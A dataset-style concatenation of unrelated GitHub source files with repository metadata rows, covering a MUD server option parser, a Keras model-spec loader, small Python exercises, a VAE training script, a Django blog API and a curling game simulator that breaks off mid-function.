import mudsling
print "MUDSling version:", mudsling.version
super(Options, self).opt_version()
def postOptions(self):
self['gamedir'] = os.path.abspath(self['gamedir'])
def get_options(args=None):
"""
Parse the MUDSling commandline options from the argv after the script
name.
Upon failiure to parse, will print usage information and exit with code 1.
:rtype: Options
"""
args = sys.argv[1:] if args is None else args
options = Options()
try:
options.parseOptions(args)
except usage.UsageError as e:
sys.stderr.write(e.message + '\n' + str(options))
exit(1)
return options
|
[
"josh@bennerweb.com"
] |
josh@bennerweb.com
|
0e9e64e1b194555091af23e06be2294e7766906a
|
8c6469dbf424c8f8afac562ef0ad4b99f77d1afb
|
/venv/lib/python3.5/site-packages/keras_model_specs/model_spec.py
|
fdc84e2aa7702b851f6c3bfcec9a5d1f4a8eb14c
|
[] |
no_license
|
KIM-jihye/Ganre_classification
|
819b1fcfcf9a5e913db7d4e62b3891367e9980db
|
3274faa0b0f9a2d150fc3d1ac50c048344304f05
|
refs/heads/master
| 2020-03-27T00:59:15.845532
| 2018-08-22T07:52:25
| 2018-08-22T07:52:25
| 145,672,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,731
|
py
|
import os
import json
import numpy as np
import importlib
import copy
from six import string_types
from keras.preprocessing.image import load_img
def between_plus_minus_1(x, args=None):
# equivalent to keras.applications.mobilenet.preprocess_input
x = x / 255.
x = x - 0.5
x = x * 2.
return x
def mean_subtraction(x, args=None):
# equivalent to keras.applications.imagenet_utils.preprocess_input (with channels_first)
mean_r, mean_g, mean_b = args
x = x - [mean_r, mean_g, mean_b]
x = x / 255.
x = x * 2.
return x
PREPROCESS_FUNCTIONS = {
'between_plus_minus_1': between_plus_minus_1,
'mean_subtraction': mean_subtraction,
}
SPEC_FIELDS = ['name', 'klass', 'target_size', 'preprocess_func', 'preprocess_args']
with open(os.path.join(os.path.split(__file__)[0], 'model_specs.json')) as file:
BASE_SPECS = json.load(file)
BASE_SPEC_NAMES = BASE_SPECS.keys()
class ModelSpec(object):
@classmethod
def get(cls, base_spec_name, **overrides):
spec = copy.copy(BASE_SPECS.get(base_spec_name, {}))
if len(spec) == 0 and len(overrides) == 0:
return None
spec['name'] = base_spec_name
for field in SPEC_FIELDS:
# Ignore incoming None fields
if overrides.get(field) is not None:
spec[field] = overrides[field]
return ModelSpec(spec)
def __init__(self, spec):
self.name = None
self.klass = None
self.target_size = None
self.preprocess_func = None
self.preprocess_args = None
self.__dict__.update(spec)
self.preprocess_input = lambda x: PREPROCESS_FUNCTIONS[self.preprocess_func](x, args=self.preprocess_args)
if isinstance(self.klass, string_types):
self.klass = self._get_module_class(self.klass)
def as_json(self):
return {
'name': self.name,
'klass': '.'.join([self.klass.__module__, self.klass.__name__]) if self.klass else None,
'target_size': self.target_size,
'preprocess_func': self.preprocess_func,
'preprocess_args': self.preprocess_args
}
def load_image(self, image_path):
img = load_img(image_path, target_size=self.target_size[:2])
image_data = np.asarray(img, dtype=np.float32)
image_data = np.expand_dims(image_data, axis=0)
image_data = self.preprocess_input(image_data)
return image_data
def _get_module_class(self, module_class_path):
module_and_class_parts = module_class_path.split('.')
module = importlib.import_module('.'.join(module_and_class_parts[:-1]))
return getattr(module, module_and_class_parts[-1])
|
[
"wore03@naver.com"
] |
wore03@naver.com
|
11e9bc424f9fe9fd08fcc4a0342973d46855481b
|
ce2bc16ac803434be57c7813732c97ca0b6bd6c7
|
/lab03/exercise_1.py
|
281d3c3ac017e9a7f1de21e9ce96d3ac97068b51
|
[] |
no_license
|
mathana96/dev-ops
|
0600b22b39d7b619d7f6e303d6d7366b068fb98e
|
c5eb00294bdcd4965e409b17f62e904ffd17b239
|
refs/heads/master
| 2021-07-15T22:01:27.180601
| 2017-10-19T17:59:32
| 2017-10-19T17:59:32
| 104,484,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
def miles_to_feet(miles):
return miles*5280
print(miles_to_feet(13), 'feet')
|
[
"mathana96@gmail.com"
] |
mathana96@gmail.com
|
170eb15dd108319e3dd7d98ee27b9c4fe775a40c
|
91f853597f03898415878e1b2f1c3086880c5369
|
/dictionary.py
|
ceed421d4b2d4cbd188f9cf3acc81da6bb372dcb
|
[] |
no_license
|
crakama/Python-Playground
|
0b7c6826c536f81d1ab23e4e07a0181c05ec19c6
|
a044d690c7e63c1e3b74383e1426d07d04c103fc
|
refs/heads/master
| 2021-01-17T16:00:20.546879
| 2016-06-20T20:42:03
| 2016-06-20T20:42:03
| 58,690,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,046
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
def dictionary(dictlist, dictlist2):
dictMap = dict(s.split(' ') for s in dictlist)
keys = dictMap.keys()
for x in dictlist2:
if x in keys:
print "{}={}".format(x,dictMap[x] )
else:
print "Not found"
dict_ = int(raw_input())
dictlist = []
dictlist2 = []
for i in range(0, dict_):
string = raw_input()
dictlist.append(string)
for z in range(0, dict_):
string2 = raw_input()
dictlist2.append(string2)
dictionary(dictlist,dictlist2)
# Enter your code here. Read input from STDIN. Print output to STDOUT
import sys
dict_ = int(raw_input().strip())
contacts = {}
dictlist = []
for i in range(dict_):
string = raw_input().strip().split(' ')
contacts[str(string[0])] = int(string[1])
for i in range(dict_):
string2 = raw_input()
dictlist.append(string2)
for line in dictlist:
if line in contacts:
print "{}={}".format(line, contacts[line])
else:
print 'Not found'
|
[
"crakama89@gmail.com"
] |
crakama89@gmail.com
|
5ac0b2762aefba1170831c34bd85f611ef70882b
|
f6597a4ff486091aa0f12999a793a61f70a5e7e6
|
/common/game/config.py
|
046daeee0e2ca32b772e055ce93e27d3095677b8
|
[] |
no_license
|
Voldy87/battleshippy
|
775e2ffb7446556ed087ec50bc1611092e16ae34
|
4e51bd51f45abec91933dd5418d92b7b17dafcf4
|
refs/heads/master
| 2021-09-06T22:02:52.735354
| 2018-02-12T10:11:57
| 2018-02-12T10:11:57
| 113,707,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
import common.utils.enums
def buildTerminalCodes():
res = {
"Reset":,
"Void":,
"Ship":
"Sinked":
"Shot":
"LastShot":
}
class GameConfig():
def __init__(self,interface:InterfaceType , storage:StorageType, shipDistance:int, shotRadius:int, LetCol:bool, outputPC:bool, clear:bool=:
self.data=storage,
self.distance=shipDistance,
self.area= shotRadius, # taken from config, too
self.LetCol=LetCol,
self.viewPCoutput=outputPC,
self.clear=clear
def load(self):
pass
def save(self):
pass
|
[
"ing.orlandi.andrea@gmail.com"
] |
ing.orlandi.andrea@gmail.com
|
242e1932b6c0ce135a1f29cac19fa16670a1c91e
|
0ae860c93319e6f02dacc9f6aca03faca3e612ce
|
/train.py
|
eeb554b5e7b2ac9ce59dcdb75848528eabffa2e4
|
[] |
no_license
|
cenchaojun/basic_detector
|
52f50bdae717537828312720ed6bbb48922b88db
|
09f388f79a634347b4cd0ccb870c2d1d52c52033
|
refs/heads/master
| 2022-02-01T23:30:02.930967
| 2019-05-21T08:20:47
| 2019-05-21T08:20:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,512
|
py
|
import InfoManagement
import BuildModelpy
import BuildDataLoader
import torch
from Mnist_Net import test_if_cuda_ok
import numpy as np
# 一些参数
train_index_file = './PIE_DATA/train_index.txt'
log_file_path = './model/log.txt'
info_file_path = './model/info.info'
from torch.autograd import Variable
from torchvision.utils import save_image
GPU_NUM = -1
TOTAL_SIZE = 10262
TRAIN_SIZE = 10000
VALIDATE_SIZE = TOTAL_SIZE - TRAIN_SIZE
BATCH_SIZE = 50
IMG_SIZE = 64
ClassNum = 10
EPOCH = 600
SAVE_STEP = 3
# 查看设备信息,选择是否使用GPU
torch.cuda.set_device(1)
test_if_cuda_ok.test_gpu()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
if torch.cuda.is_available():
print('USE cuda')
else:
print('USE CPU')
# 建立 模型文件夹、日志、其他信息
model_folder = InfoManagement.ModelFloder(rebuild=False)
log = InfoManagement.LogFile(log_file_path, renew=False)
info = InfoManagement.InfoFile(info_file_path)
PRE_EPOCH = model_folder.epoch # 使用之前的epoch
# 继承之前对于训练集和验证集的划分
train_index = []
validata_index = []
if info.data != None:
[train_index, validata_index] = info.data
else:
train_index = list(np.random.choice(range(TRAIN_SIZE + VALIDATE_SIZE), TRAIN_SIZE, replace=False))
validata_index = []
for x in range(TRAIN_SIZE + VALIDATE_SIZE):
if x not in train_index:
validata_index.append(x)
print(x)
info.dump([train_index, validata_index])
# 建立 data loader、model、optimizer、loss_fun
[train_loader, validate_loader] = \
BuildDataLoader.BuildTraining(BATCH_SIZE, IMG_SIZE,
train_index_file ,train_index, validata_index)
[basic_model, loss_fun] = \
BuildModelpy.build_model(ClassNum=ClassNum)
# print(len(validate_loader))
if model_folder.load_model():
basic_model = model_folder.load_model()
print('load pre_model')
else:
print('build new model ')
basic_model = basic_model.to(device)
optimizer, scheduler = \
BuildModelpy.build_optimizer(basic_model)
# 开始训练
loss_list = []
# 计算一批input的准确率
def cal_acc(basic_model, inputs, labels):
correct = 0
predicts = []
with torch.no_grad():
inputs = inputs.to(device)
outputs = basic_model(inputs)
# predict为每一行最大的值的下标
_, predicts = torch.max(outputs, 1)
correct += (predicts == labels).sum()
acc = float(correct) / float(len(labels))
log.write('acc: %f\n' % acc)
del inputs, outputs, predicts, acc
return float(correct)
def train_model(pre_epoch, total_epoch):
for epoch in range(pre_epoch, total_epoch):
epoch_loss: float = 0 # total loss in one epoch
log.write('epoch: %d\n' % epoch)
train_acc = 0 # accuracy in training set
count = 0 # show iteration in one epoch
log.write('lr: %lf\n' % BuildModelpy.get_learning_rate(optimizer)[0])
for data1 in train_loader:
[inputs, labels] = data1 # use zip to validate model during training
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
outputs = basic_model(inputs)
recon_x, mu, logvar = basic_model(inputs)
loss = loss_fun(recon_x, inputs, mu, logvar)
loss.backward()
optimizer.step()
# 记录损失函数的值
loss_list.append(loss)
# log.write('iter: %d, loss: %f\n' % (count, loss))
epoch_loss = float(epoch_loss + loss)
# train_acc = train_acc + cal_acc(basic_model, inputs, labels)
del inputs, outputs, loss, labels
del recon_x, mu, logvar
count = count + 1
log.write('epoch_loss: %f\n' % epoch_loss)
scheduler.step()
# print(BuildModel.get_learning_rate(optimizer))
# log.write('total_correct: %f\n' % train_acc)
if epoch % SAVE_STEP == 0:
basic_model.eval()
sample = Variable(torch.randn(64, 64)).cuda()
sample = basic_model.decoder(basic_model.fc2(sample).view(64, 256, 16, 16)).cpu()
save_image(sample.data.view(64, 1, 64, 64),
'result/sample_' + str(epoch) + '.png')
print('img saved')
# save model
model_folder.save_model(basic_model)
if __name__ == '__main__':
train_model(PRE_EPOCH, EPOCH)
|
[
"35644942+floatingstarZ@users.noreply.github.com"
] |
35644942+floatingstarZ@users.noreply.github.com
|
988f5a199dc0023d57a799d494c2ff084c671857
|
207d8dfb55521fc872e719d51dc9888f53d37c02
|
/apps/Skill/config.py
|
11ee7291a7cb5a54213efc36c2555fcda18a6018
|
[
"MIT"
] |
permissive
|
Gaganabbot/DigiMateApp
|
8eb75efc073770ad40eb8847f24693206f4f4f79
|
96bbc581eca46421dad2bc28333030f556b22be9
|
refs/heads/main
| 2023-08-18T14:07:20.849086
| 2021-10-09T04:31:03
| 2021-10-09T04:31:03
| 415,201,638
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
from django.apps import AppConfig
class SkillConfig(AppConfig):
# default_auto_field = 'django.db.models.BigAutoField'
# name = 'Skill'
name = 'apps.Skill'
label = 'Skill'
|
[
"abbotgagan.vasu@gmail.com"
] |
abbotgagan.vasu@gmail.com
|
2d649ccf72a307bdb505a8e40c224565c08e1435
|
ceb2ef3dcb89ebda8a56623d1e76a43e4094aaf7
|
/blog/views.py
|
5ebd15d473640a00f22c3695d3bfed538a12d550
|
[] |
no_license
|
Kagati-Incorporation/demo-api
|
13565a58b21a395e6fa638179a3f603deaa9c8ca
|
52f8afeceacc9ad4ccf2b002c90175f75e765e9d
|
refs/heads/main
| 2023-05-07T11:55:34.531710
| 2021-05-19T08:39:20
| 2021-05-19T08:39:20
| 368,797,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, viewsets, status
from rest_framework.response import Response
from common.permissions import IsAdminUserOrReadOnly
from .models import (
BlogCategory,
Article,
)
from .serializers import (
BlogCategorySerializer,
ArticleSerializer,
)
class CategoryAPI(viewsets.ModelViewSet):
"""
Category Listing API
"""
permission_classes = (IsAdminUserOrReadOnly,)
serializer_class = BlogCategorySerializer
queryset = BlogCategory.objects.all()
def paginate_queryset(self, queryset):
if self.paginator and self.request.query_params.get(self.paginator.page_query_param, None) is None:
return None
return super().paginate_queryset(queryset)
def create(self, request):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(
{
'message': 'Successfully Added Category',
'data': serializer.data
},
status.HTTP_201_CREATED
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
obj = self.get_object()
serializer = self.get_serializer(obj, data=request.data)
if serializer.is_valid():
obj = serializer.save()
return Response(
{
'message': 'Successfully Edited Category',
'data': serializer.data
},
status.HTTP_200_OK
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
name = instance.title
self.perform_destroy(instance)
return Response(
{
'message': f'{name} Deleted Successfully'
},
status.HTTP_204_NO_CONTENT
)
class ArticleAPI(viewsets.ModelViewSet):
"""
Article Listing API
search param:
Category Title
Filter param:
Category ID
Ordering Param:
views
"""
permission_classes = (IsAdminUserOrReadOnly,)
serializer_class = ArticleSerializer
queryset = Article.objects.all()
filter_backends = [filters.SearchFilter, filters.OrderingFilter, DjangoFilterBackend]
search_fields = ['category__title', 'title']
filterset_fields = ('category', 'author')
ordering_fields = ['views', 'created_at']
def retrieve(self, request, pk):
article = self.get_object()
session_key = 'viewed_article_{}'.format(article.id)
if not request.session.get(session_key, False):
article.views += 1
article.save()
request.session[session_key] = True
return Response(ArticleSerializer(article).data)
def create(self, request):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save(author=request.user)
return Response(
{
'message': 'Successfully Added Article',
'data': serializer.data
},
status.HTTP_201_CREATED
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
obj = self.get_object()
serializer = self.get_serializer(obj, data=request.data)
if not (obj.author == request.user):
return Response(
{
'message': 'Unauthorized User !'
}, status.HTTP_403_FORBIDDEN
)
if serializer.is_valid():
obj = serializer.save()
return Response(
{
'message': 'Successfully Edited Article',
'data': serializer.data
},
status.HTTP_200_OK
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
name = instance.name
self.perform_destroy(instance)
return Response(
{
'message': f'{name} Deleted Successfully'
},
status.HTTP_204_NO_CONTENT
)
|
[
"ajaykarki333@gmail.com"
] |
ajaykarki333@gmail.com
|
e286a7fae6c77f9c18bb9c0f7ca4a85580e0e8cf
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/override/overriddenMethodRaisesNotImplementedError_after.py
|
75e07e08f875187bf0e1ff426642397036a7e7df
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
class A:
def m(self):
"""Abstract method."""
raise NotImplementedError('Should not be called directly')
class B(A):
def m(self):
pass
|
[
"mikhail.golubev@jetbrains.com"
] |
mikhail.golubev@jetbrains.com
|
f0b454bac4434f77a0742f80849f5e4ca6fc0574
|
4ee39c4c0ff2038f7834abdae82e74647bdcb596
|
/Lesson3/time_example.py
|
9f67681629355400addb3059b6dd575ae4abcae6
|
[] |
no_license
|
michaeldelcid/Design6
|
994a42d027080c7cb3413dd2cbba7a939b376b5f
|
cfd4080fcef6688d899c6af9a099f4e3a68dc40f
|
refs/heads/master
| 2021-05-24T15:40:36.722511
| 2020-05-10T23:51:06
| 2020-05-10T23:51:06
| 253,636,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
py
|
#Displays current time every 10 seconds
import time
while True:
try:
nowtime = time.time()
print(time.asctime(time.localtime(nowtime)))
time.sleep(10)
except KeyboardInterrupt:
exit()
|
[
"DiegoOrnelas@Diegos-MBP.home"
] |
DiegoOrnelas@Diegos-MBP.home
|
8b03ceae0eed2e323a4dda60dc65d17b7bce4ae3
|
27cc9a0797304ee837b899805deb9a3b8ba98fe8
|
/recognizer/settings.py
|
70d2d18bc94674bf1f7d13ad58a7e298dac49c6d
|
[] |
no_license
|
ivanpobeguts/celebrities_recognizer
|
ef20ebf073fb05bd5f1557f85703f396d7751caa
|
a1a259ea2d4f42e08d82264d1c096339e377d50a
|
refs/heads/master
| 2020-03-30T06:35:28.066632
| 2019-02-26T12:16:44
| 2019-02-26T12:16:44
| 150,873,124
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
import cv2
import dlib
import logging
recognizer = cv2.face.LBPHFaceRecognizer_create(threshold=95)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
face_cascade = cv2.CascadeClassifier('opencv_files/lbpcascade_frontalface.xml')
logger = logging.getLogger('Debug logger')
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
# ch.setLevel(logging.INFO)
logger.addHandler(ch)
labels_dict = {}
|
[
"Ivan.Pobeguc@gmail.com"
] |
Ivan.Pobeguc@gmail.com
|
1e860576902d08e2ba1bdeef159021e45fde7caf
|
d18fe449ca37dca20c420b5a5e3f236dd4671f1f
|
/main.py
|
ea3023706d48149ac9aa16e253f80098547007d2
|
[] |
no_license
|
makhtar-sarr/python-projet
|
db55afb156972fe65893d02a1c1efd099433aa0f
|
b0d8bbd1ce0c2566e32b3c09f97faaa3f59d3c97
|
refs/heads/master
| 2023-06-13T02:37:36.745837
| 2021-07-01T20:21:23
| 2021-07-01T20:21:23
| 382,161,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
# Import des modules
from point import*
from cercle import*
from cylindre import*
# Teste de la classe Point
print("**** Teste de la classe Point ***")
point1 = Point(4, 0)
point2 = Point(1, 2)
point1.afficher()
point2.afficher()
print()
# Teste de la classe Cercle
print("*** Teste de la classe Cercle ***")
cercle = Cercle(0, 0, 4)
print("Perimetre = ",cercle.getPerimetre())
print("Surface = ",cercle.getSurface())
if cercle.appartient(point1) == True:
print("Point1 appartient au Cercle ")
else:
print("Point1 n\'appartient au Cercle ")
if cercle.appartient(point2) == True:
print("Point2 appartient au Cercle ")
else:
print("Point2 n\'appartient au Cercle ")
cercle.afficher()
print()
# Teste de la classe Cylindre
cylindre = Cylindre(0, 4, 8, 10)
print("Volume =", cylindre.getVolume())
|
[
"makhtar.sarr@univ-thies.sn"
] |
makhtar.sarr@univ-thies.sn
|
76d685a1fbc238802b19c89e2a55dae3af5f6355
|
e47b1cd94c3cefa4a44ebdfcc87050896d14a8f4
|
/Points.py
|
fc74bdb86938bc992469a111cb9f1671b494df0b
|
[] |
no_license
|
thesonofpaul/Cribbage
|
ce8715c3860007954f1cf1ed20480f611613e1ff
|
e415a2e69e798c72d9921dbe29f8b2bd91c8c1e1
|
refs/heads/master
| 2021-01-19T18:42:13.629803
| 2017-04-22T00:38:36
| 2017-04-22T00:38:36
| 88,375,608
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,108
|
py
|
class Points(object):
def __init__(self, cards, top_card):
self.cards = cards
self.cards.append(top_card)
self.cards_only_rank = []
for card in self.cards:
self.cards_only_rank.append(card.rank)
self.cards_only_rank.sort()
self.top_card = top_card
self.points = 0
def run_points(self):
# print "---------------"
# for card in self.cards:
# print card
# print "---------------"
self.fifteens()
self.pairs()
self.runs()
self.flush()
self.nobs()
def fifteens(self, index=0, total=0):
# print "fifteens"
for i in range(index, 5):
value = 10 if self.cards_only_rank[i] > 9 else self.cards_only_rank[i]
subtotal = total + value
if subtotal == 15:
self.points += 2
elif subtotal < 15:
self.fifteens(i + 1, subtotal)
def pairs(self):
# print "pairs"
for i in range(len(self.cards_only_rank)):
for j in range(len(self.cards_only_rank)):
if j > i and self.cards_only_rank[i] == self.cards_only_rank[j]:
self.points += 2
def runs(self):
# print "runs"
for index in range(len(self.cards_only_rank)-2):
card1 = self.cards_only_rank[index]
card2 = self.cards_only_rank[index+1]
card3 = self.cards_only_rank[index+2]
card4 = None
card5 = None
if index < len(self.cards_only_rank)-3:
card4 = self.cards_only_rank[index+3]
if index < len(self.cards_only_rank) - 4:
card5 = self.cards_only_rank[index+4]
if card1+1 == card2 and card2+1 == card3:
if card3+1 == card4:
if card4+1 == card5:
self.points += 5
elif card4 == card5:
self.points += 8
else:
self.points += 4
break
elif card3 == card4:
if card4 == card5:
self.points += 9
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
else:
self.points += 3
elif card1+1 == card2 and card2 == card3:
if card3 == card4 and card4+1 == card5:
self.points += 9
elif card3+1 == card4:
if card4 == card5:
self.points += 12
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
elif card1 == card2 and card2+1 == card3:
if card3 == card4 and card4+1 == card5:
self.points += 12
elif card3+1 == card4:
if card4 == card5:
self.points += 12
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
elif card1 == card2 == card3 and card3+1 == card4 and card4+1 == card5:
self.points += 9
break
def flush(self):
# print "flush"
temp_cards = self.cards
temp_cards.remove(self.top_card)
for i in range(len(temp_cards)-1):
if temp_cards[i].suit != temp_cards[i+1].suit:
return
if temp_cards[0].suit == self.top_card.suit:
self.points += 5
else:
self.points += 4
def nobs(self):
# print "nobs"
if self.top_card.rank == 11:
self.points += 1
return
for card in self.cards:
if card.rank == 11 and card.suit == self.top_card.suit:
self.points += 1
|
[
"zip822@gmail.com"
] |
zip822@gmail.com
|
15e54e2df375dea9ea57b03a8e8b762aeceba27f
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/cloudhsmv2_write_f/cluster_modify.py
|
4f98bd4495101541c02e7be7ac34b2aecfad03bd
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 869
|
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
create-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/create-cluster.html
delete-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/delete-cluster.html
describe-clusters : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/describe-clusters.html
initialize-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/initialize-cluster.html
"""
write_parameter("cloudhsmv2", "modify-cluster")
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
8189d9b62eaf50260c9bf25002b16465287e537d
|
f0117325b7a40779965b35ec6cefc8d12353d779
|
/python_exercises/py_part1_ex/9_one_to_ten.py
|
b4663a6bc10c31703648a4cfcc871ba081b263fc
|
[] |
no_license
|
joshwestbury/Digital_Crafts
|
4188e71ad631439dcb2cca9eea63d29400c37dc0
|
66c06f198d110388781a30c0ecb7902d3a8daf5a
|
refs/heads/master
| 2021-07-24T05:37:02.370341
| 2017-11-04T14:36:39
| 2017-11-04T14:36:39
| 103,189,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
count = 0
while count < 10:
count +=1
print(count)
|
[
"joshwestbury@gmail.com"
] |
joshwestbury@gmail.com
|
d207853ea6fce05a1527e4ac9cc1b8ee1c66a4c9
|
345b6cfbb505076afc2593da0d834a468d6fb4e4
|
/projects/curling/python/dc.py
|
921e1b2a62089f3e6b5a97e415320321b3941aa2
|
[] |
no_license
|
u-tokyo-gps-tanaka-lab/gpw2016
|
880d6f8ec097c122ba758767c97e668a8de255d4
|
2760930ec1cacdd7d78f86268beac693a537582b
|
refs/heads/master
| 2021-01-13T09:44:59.200368
| 2017-05-10T08:34:47
| 2017-05-10T08:34:47
| 70,134,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,893
|
py
|
# -*- coding: utf-8 -*-
# dc.py
# Katsuki Ohto
import math
import numpy as np
# constant
BLACK = 1
WHITE = 0
N_ENDS = 10
END_LAST = 0
N_TURNS = 16
TURN_LAST = 0
def to_turn_color(t):
return t % 2
N_COLOR_STONES = 8
N_STONES = N_COLOR_STONES * 2
SCORE_MIN = -N_COLOR_STONES
SCORE_MAX = +N_COLOR_STONES
SCORE_LENGTH = SCORE_MAX - SCORE_MIN + 1
def StoIDX(s):
return s - SCORE_MIN
STONE_RADIUS = 0.145
HOUSE_RADIUS = 1.83
X_TEE = 0
Y_TEE = 0
PLAYAREA_WIDTH = 4.75
PLAYAREA_LENGTH = 8.23
X_PLAYAREA_MIN = X_TEE - PLAYAREA_WIDTH / 2
X_PLAYAREA_MAX = X_TEE + PLAYAREA_WIDTH / 2
Y_PLAYAREA_MIN = Y_TEE + HOUSE_RADIUS - PLAYAREA_LENGTH
Y_PLAYAREA_MAX = Y_TEE + HOUSE_RADIUS
X_THROW = X_TEE
Y_THROW = Y_PLAYAREA_MIN - 30.0
R_IN_HOUSE = HOUSE_RADIUS + STONE_RADIUS
R2_IN_HOUSE = R_IN_HOUSE * 2
XY_TEE = (X_TEE, Y_TEE)
XY_THROW = (X_THROW, Y_THROW)
VX_TEE_SHOT_R = -0.99073974
VY_TEE_SHOT = +29.559775
RIGHT = 0
LEFT = 1
TEE_SHOT_R = (VX_TEE_SHOT_R, VY_TEE_SHOT, RIGHT)
ERROR_SIGMA = 0.145
ERROR_SCALE_X = 0.5 # gat version
ERROR_SCALE_Y = 2.0 # gat version
VX_ERROR_SIGMA = 0.117659 * ERROR_SCALE_X
VY_ERROR_SIGMA = 0.0590006 * ERROR_SCALE_Y
def official_to_ayumu_turn(t):
return N_TURNS - 1 - t
def official_to_ayumu_position(p):
return (p[0] - X_TEE, 4.83 - p[1])
def ayumu_to_official_move(mv):
return (mv[0], -mv[1], mv[2])
def is_in_house_r(r):
return bool(r < R_IN_HOUSE)
def is_in_house_r2(r2):
return bool(r2 < R2_IN_HOUSE)
def is_in_house_xy(x, y):
dx = x - X_TEE
dy = y - Y_TEE
return is_in_house_r2(dx * dx + dy * dy)
def is_in_play_area_xy(x, y):
return bool((X_PLAYAREA_MIN < x) and (x < X_PLAYAREA_MAX) and (Y_PLAYAREA_MIN < y) and (y < Y_PLAYAREA_MAX))
def is_in_play_area(pos):
return is_in_play_area_xy(pos[0], pos[1])
def calc_r2(a, b):
return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
def calc_r(a, b):
return np.hypot(b[0] - a[0], b[1] - a[1])
def calc_th(a, b):
return np.arctan2(b[1] - a[1], b[0] - a[0])
class Board:
def __init__(self):
self.init();
def init(self):
self.end = END_LAST
self.turn = TURN_LAST
self.rscore = 0
self.stone = np.empty(N_STONES, dtype = tuple)
def locate_in_throw_point(self):
for i in range(N_STONES):
self.stone[i] = XY_THROW
def count_score_a(sa): # count stone score by array
bmin2 = R2_IN_HOUSE
wmin2 = R2_IN_HOUSE
for i in range(BLACK, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
bmin2 = min(bmin2, r2)
for i in range(WHITE, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
wmin2 = min(wmin2, r2)
cnt = 0
if bmin2 > wmin2:
for i in range(WHITE, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
if r2 < bmin2:
cnt -= 1
elif bmin2 < wmin2:
for i in range(BLACK, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
if r2 < wmin2:
cnt += 1
return cnt
def count_score(bd): # count stone score on board
return count_score_a(bd.stone)
def is_caving_in_pp(p0, p1):
return (calc_r2(p0, p1) < ((2 * STONE_RADIUS) ** 2))
def is_caving_in_bp(bd, p):
for i in range(N_STONES):
if is_caving_in_pp(bd.stone[i], p):
return True
return False
def locate_in_play_area_p():
return (X_PLAYAREA_MIN + np.random.rand() * PLAYAREA_WIDTH,
Y_PLAYAREA_MIN + np.random.rand() * PLAYAREA_LENGTH)
def locate_in_house_p():
r = np.random.rand() * R_IN_HOUSE
th = np.random.rand() * 2 * math.pi
return (X_TEE + r * math.sin(th), Y_TEE + r * math.cos(th))
def locate_in_play_area_b(nb, nw):
